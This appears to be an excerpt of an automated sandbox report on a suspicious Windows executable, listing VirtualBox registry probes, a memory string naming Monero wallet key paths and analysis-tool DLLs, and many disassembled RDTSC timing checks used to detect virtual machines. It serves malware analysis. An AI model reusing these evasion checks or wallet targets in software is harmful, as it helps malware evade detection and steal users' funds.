Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:28:0516:28:0516:28:0516:28:0516:28:0516:28:05DELAYS.TMP%S%SNTDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10042EC second address: 1004315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F76E5036BC0h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFAF second address: 101DFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFB5 second address: 101DFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFBA second address: 101DFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DF9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E145 second address: 101E180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76E5036BB4h 0x00000008 jmp 00007F76E5036BB8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F76E5036BA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E180 second address: 101E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E47F second address: 101E483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E629 second address: 101E62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E94E second address: 101E97C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F76E5036BA6h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F76E5036BB7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E97C second address: 101E998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76E5186DF4h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102145A second address: 102145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102145E second address: 1021464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021464 second address: 102146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102146A second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F76E5186DF3h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F76E5186DF4h 0x0000001c pop eax 0x0000001d cld 0x0000001e push dword ptr [ebp+122D06E1h] 0x00000024 mov dx, di 0x00000027 call dword ptr [ebp+122D219Bh] 0x0000002d pushad 0x0000002e jnc 00007F76E5186DE7h 0x00000034 xor eax, eax 0x00000036 pushad 0x00000037 xor esi, 7ABDAB1Ch 0x0000003d mov dx, di 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D220Ch], edx 0x0000004b stc 0x0000004c mov dword ptr [ebp+122D2A9Bh], eax 0x00000052 mov dword ptr [ebp+122D292Ch], edx 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e or dword ptr [ebp+122D220Ch], ebx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 stc 0x00000069 lodsw 0x0000006b cld 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 xor dword ptr [ebp+122D292Ch], esi 0x00000076 jmp 00007F76E5186DF4h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D292Ch], ecx 0x00000085 push eax 0x00000086 jbe 00007F76E5186DF8h 0x0000008c push eax 0x0000008d push edx 0x0000008e jno 00007F76E5186DE6h 0x00000094 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021672 second address: 10216C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F76E5036BABh 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D2A4Fh] 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D30BDh], edx 0x0000001f call 00007F76E5036BA9h 0x00000024 jmp 00007F76E5036BACh 0x00000029 push eax 0x0000002a jc 00007F76E5036BB2h 0x00000030 js 00007F76E5036BACh 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10216C9 second address: 10216CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10216CF second address: 102173F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BB7h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F76E5036BB7h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b jnc 00007F76E5036BACh 0x00000021 pop eax 0x00000022 pop eax 0x00000023 movzx esi, bx 0x00000026 or esi, dword ptr [ebp+122D2D41h] 0x0000002c push 00000003h 0x0000002e xor dword ptr [ebp+122D2946h], edx 0x00000034 push 00000000h 0x00000036 movsx edx, si 0x00000039 push 00000003h 0x0000003b mov cl, ah 0x0000003d call 00007F76E5036BA9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102173F second address: 1021745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021745 second address: 1021761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021761 second address: 10217BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F76E5186DF8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 ja 00007F76E5186DFCh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F76E5186DECh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10217BC second address: 10217C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021885 second address: 102188F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102193E second address: 1021946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 103FE1D second address: 103FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F76E5186DE6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1040AE7 second address: 1040AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1040AEB second address: 1040AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104160B second address: 104160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104160F second address: 1041621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041621 second address: 1041627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041627 second address: 1041631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104191E second address: 1041922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041922 second address: 1041945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5186DE6h 0x00000008 jmp 00007F76E5186DF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041AD4 second address: 1041AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB3h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041AF0 second address: 1041AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1044A57 second address: 1044A61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1045061 second address: 1045091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F76E5186DEEh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007F76E5186DF2h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10487E6 second address: 10487EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10487EA second address: 10487EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10168F2 second address: 10168F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1049DDD second address: 1049E07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DF4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007F76E5186DE6h 0x00000013 jbe 00007F76E5186DE6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1049E07 second address: 1049E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F76E5036BA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D10F second address: 104D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jng 00007F76E5186DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D11F second address: 104D127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D127 second address: 104D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D12D second address: 104D13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 ja 00007F76E5036BB0h 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D287 second address: 104D29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEEh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104D588 second address: 104D58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104EEAF second address: 104EEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEAh 0x00000009 popad 0x0000000a jbe 00007F76E5186DFCh 0x00000010 jmp 00007F76E5186DF0h 0x00000015 js 00007F76E5186DE6h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 100C98E second address: 100C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76E5036BA6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051D00 second address: 1051D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051D04 second address: 1051D0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1051D0A second address: 1051D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105236F second address: 1052379 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5036BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1052419 second address: 1052420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105294D second address: 1052952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1052AD6 second address: 1052ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105330A second address: 1053310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1053310 second address: 1053314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1053314 second address: 1053377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F76E5036BA8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov si, C81Ah 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F76E5036BA8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D2C1Bh] 0x0000004b push 00000000h 0x0000004d clc 0x0000004e xchg eax, ebx 0x0000004f push edi 0x00000050 je 00007F76E5036BACh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1053DD6 second address: 1053DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1054CE9 second address: 1054CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1054CED second address: 1054D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F76E5186DE6h 0x00000010 jmp 00007F76E5186DF0h 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F76E5186DE8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov di, 55C7h 0x0000003a mov esi, edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnl 00007F76E5186DECh 0x00000045 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1054D55 second address: 1054D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10561CA second address: 10561D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10561D0 second address: 10561D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10561D5 second address: 10561DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1057794 second address: 10577A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10577A3 second address: 10577A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10577A8 second address: 10577AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10577AD second address: 10577B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105928E second address: 1059294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1059870 second address: 105987A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105987A second address: 1059880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1059880 second address: 1059884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1000D78 second address: 1000D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
